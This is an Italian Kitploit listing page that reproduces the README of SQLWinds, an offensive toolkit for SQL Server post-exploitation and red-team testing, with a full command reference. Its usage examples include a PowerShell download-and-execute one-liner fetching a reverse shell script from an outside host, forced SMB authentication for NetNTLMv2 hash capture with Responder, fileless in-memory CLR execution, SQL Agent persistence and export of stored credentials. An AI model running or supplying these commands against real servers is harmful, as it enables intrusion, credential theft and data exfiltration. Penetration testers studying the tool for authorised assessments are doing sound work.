Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
sqlwinds — SQLWinds - Toolkit per la valutazione della sicurezza e post-exploitation di SQL Server | Kitploit
Strumenti/GitHubGitHub/blue0x1/sqlwinds
Escalation di PrivilegiMeccanismi di PersistenzaExploitMovimento LateraleAudit di ConfigurazioneEsfiltrazione DatiPost-ExploitPenetration TestingRed TeamingSicurezza dei Database
GitHubblue0x1/sqlwinds
11 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

sqlwinds

SQLWinds - Toolkit per la valutazione della sicurezza e post-exploitation di SQL Server

Vedi Repository

SQLWinds

Toolkit per la valutazione della sicurezza SQL e post-exploitation

SQLWinds è uno strumento da riga di comando per test di sicurezza ed exploit di Microsoft SQL Server. Offre un ambiente interattivo per analizzare in profondità i server, elevare i privilegi, eseguire attacchi e spostarsi lateralmente attraverso le reti, con comandi specializzati per attività quali l'esecuzione di codice in memoria e l'esplorazione del database SCCM.


SQLWinds


📖 Documentazione e Risorse

Wiki Issues Releases

Collegamenti rapidi:

  • Documentazione completa e Wiki - Guida completa all'uso e riferimento ai comandi
  • Segnala un problema - Hai trovato un bug o vuoi richiedere una funzionalità?
  • Ultima release - Scarica la versione più recente

Funzionalità

  • Autenticazione multipla: supporta SQL, Windows Integrated (--integrated) e delega Kerberos (--kerberos con --user/--pass).
  • Enumerazione completa:
    • Informazioni sul server, database, tabelle, colonne, utenti e permessi.
    • Audit della configurazione di sicurezza (xp_cmdshell, CLR, OLE, ecc.).
    • Scoperta di dati sensibili ed estrazione di segreti.
    • Enumerazione e sfruttamento dei server collegati (linked server).
  • Post-Exploitation e Movimento Laterale:
    • Esecuzione di codice: abilita e usa xp_cmdshell, procedure di automazione OLE (sp_oacreate) e integrazione CLR.
    • CLR in memoria: carica ed esegui assembly .NET direttamente dalla memoria senza scrivere file su disco (:memclr).
    • Furto di credenziali: forza l'autenticazione SMB verso un percorso UNC per attacchi relay (:unc_smb).
    • Interazione con il registro: leggi chiavi e valori di registro tramite xp_regread.

Installazione e Compilazione

Build rapida

Il repository include uno script build.bat per una compilazione semplice su Windows:

root@kitploit:~
.\build.bat

L'eseguibile compilato SQLWinds.exe verrà inserito nella directory bin\Release\.

Build manuale

  1. Assicurati di avere installato .NET Framework (≥ 4.6.1) o .NET SDK.
  2. Clona il repository:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. Compila la soluzione:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

Utilizzo

Connessione di base

root@kitploit:~
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated

# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

Opzioni comuni della riga di comando

Modalità interattiva REPL

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

Riferimento completo dei comandi REPL

Esempio: utilizzo di :plain per script di grandi dimensioni

Il comando :plain è essenziale per eseguire script SQL lunghi e multi-riga.

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. Digita :plain e premi Invio.
  2. Incolla o digita il tuo script SQL completo.
  3. Su una nuova riga, digita :execute per eseguire l'intero script oppure :cancel per annullare.

Esempi

1. Audit

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. Sfruttare xp_cmdshell per l'esecuzione di codice

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# In the REPL that opens:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. Esecuzione CLR in memoria (fileless)

root@kitploit:~
# Compile your .NET assembly to a DLL (e.g., CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. Furto di hash NetNTLMv2 tramite SRelay

root@kitploit:~
# On your machine: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. Sfruttamento del database SCCM

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. Esfiltrazione di dati

root@kitploit:~
# Export sensitive data to CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# Download a file stored in the database
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 Contributi e Supporto

Accogliamo con piacere i contributi! Se hai idee per miglioramenti o trovi problemi:

  1. Consulta la Wiki per la documentazione
  2. Cerca tra le Issues esistenti per evitare duplicati
  3. Apri una nuova issue con informazioni dettagliate sul tuo suggerimento o sulla segnalazione di bug

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicito permesso di test è illegale. Gli sviluppatori declinano ogni responsabilità e non sono responsabili di eventuali usi impropri o danni causati da questo programma.


Crediti

Sviluppato da blue0x1.

Scarica lo strumento
  • Persistenza: crea, elenca ed esegui processi di SQL Agent.
  • Esfiltrazione di dati: carica/scarica file ed esporta i risultati delle query in CSV/JSON.
  • Interazione con il database SCCM: (se il database di destinazione è SCCM)
    • Rileva SCCM e riporta informazioni su versione/sito.
    • Inventario di hardware, software, raccolte (collections) e distribuzioni (deployments).
    • Esegui audit di sicurezza specifici per SCCM.
  • Analisi Kerberos: controlla in Active Directory gli SPN associati al target per risolvere i problemi di autenticazione Kerberos.
  • Scoperta di istanze: enumera le istanze di SQL Server disponibili nel dominio.
  • REPL avanzato: ambiente interattivo con completamento automatico e cronologia dei comandi.
  • OpzioneDescrizione
    --serverServer di destinazione (IP, hostname, istanza). Obbligatorio.
    --user, --passCredenziali per l'autenticazione SQL o Windows.
    --integratedUsa il token Windows corrente per l'autenticazione.
    --kerberosUsa il flusso di autenticazione Kerberos.
    --spn-checkControlla in AD gli SPN per l'host di destinazione.
    --run-cmd "<SQL>"Esegue un singolo comando SQL e termina.
    --run-file file.sqlEsegue uno script SQL da file e termina.
    --infoRaccoglie e mostra informazioni estese sul server.
    --getinstanceScopre le istanze SQL nel dominio e termina.
    --list-dbsElenca i database e termina.
    --security-auditEsegue un audit di sicurezza e termina.
    ComandoDescrizioneEsempio
    :infoMostra informazioni dettagliate sul server:info
    :dbsElenca tutti i database con dettagli:dbs
    :tables [db] [schema]Elenca le tabelle nel database/schema:tables master dbo
    :columns <table> [schema] [db]Elenca le colonne di una tabella:columns Users dbo MyDatabase
    :usersElenca tutti gli accessi SQL e gli utenti del database:users
    :permsMostra i permessi dell'utente corrente:perms
    :auditEsegue un audit della configurazione di sicurezza:audit
    :search [term]Cerca dati sensibili:search password
    :secretsEstrae potenziali segreti:secrets
    :servicesMostra gli account di servizio di SQL Server:services
    :spnControlla gli SPN per l'host di destinazione:spn
    :enable_xp_cmdshellAbilita xp_cmdshell:enable_xp_cmdshell
    :disable_xp_cmdshellDisabilita xp_cmdshell:disable_xp_cmdshell
    :xp <command>Esegue un comando del sistema operativo tramite xp_cmdshell:xp whoami
    :enable_oleAbilita l'automazione OLE:enable_ole
    :disable_oleDisabilita l'automazione OLE:disable_ole
    :ole_cmd <command>Esegue un comando del sistema operativo tramite OLE:ole_cmd "calc.exe"
    :enable_clrAbilita l'integrazione CLR:enable_clr
    :disable_clrDisabilita l'integrazione CLR:disable_clr
    :deploy-clr <path>Distribuisce un assembly CLR da file:deploy-clr C:\Tools\cmd.dll
    :list-assembliesElenca gli assembly CLR distribuiti:list-assemblies
    :clr_execEsegue un metodo CLR:clr_exec MyAssembly MyClass Method arg1
    :memclrEsegue un assembly CLR dalla memoria:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
    :remove-assembly <name>Rimuove un assembly CLR:remove-assembly MyAssembly
    :list_linkserversElenca i server collegati (linked server):list_linkservers
    :linkrpc <srv> <cmd>Esegue un comando tramite server collegato:linkrpc LINKEDSRV "whoami"
    :impersonate <login>Esegue l'impersonificazione di un login SQL:impersonate sa
    :revertRipristina il contesto di sicurezza:revert
    :agent_jobGestisce i processi di SQL Agent:agent_job create MyJob "whoami"
    :ls [path]Elenca una directory tramite SQL:ls C:\Windows\Temp
    :unc_smb <path>Forza l'autenticazione SMB verso UNC:unc_smb \\192.168.1.100\share
    :plainIncolla script SQL di grandi dimensioni(Vedi esempio sotto)
    :regreadLegge un valore di registro:regread HKEY_LOCAL_MACHINE Software\Microsoft value
    :regread_allElenca tutti i valori in una chiave:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
    :uploadCarica un file in una tabella:upload C:\file.txt MyTable
    :downloadScarica un binario da una query:download "SELECT file FROM blobs" out.bin
    :exportcsvEsporta la query in CSV:exportcsv "SELECT * FROM users" out.csv
    :exportjsonEsporta la query in JSON:exportjson "SELECT * FROM users" out.json
    :sccm_infoRileva il database SCCM:sccm_info
    :sccm_inventoryMostra l'inventario SCCM:sccm_inventory
    :sccm_collectionsElenca le raccolte SCCM:sccm_collections "All Systems"
    :sccm_deploymentsMostra le distribuzioni:sccm_deployments
    :sccm_clientsElenca i client:sccm_clients inactive
    :sccm_auditAudit di sicurezza SCCM:sccm_audit
    :sccm_applicationMostra i dettagli dell'applicazione:sccm_application "Google Chrome"
    helpMostra la guidahelp
    exitEsce dalla REPLexit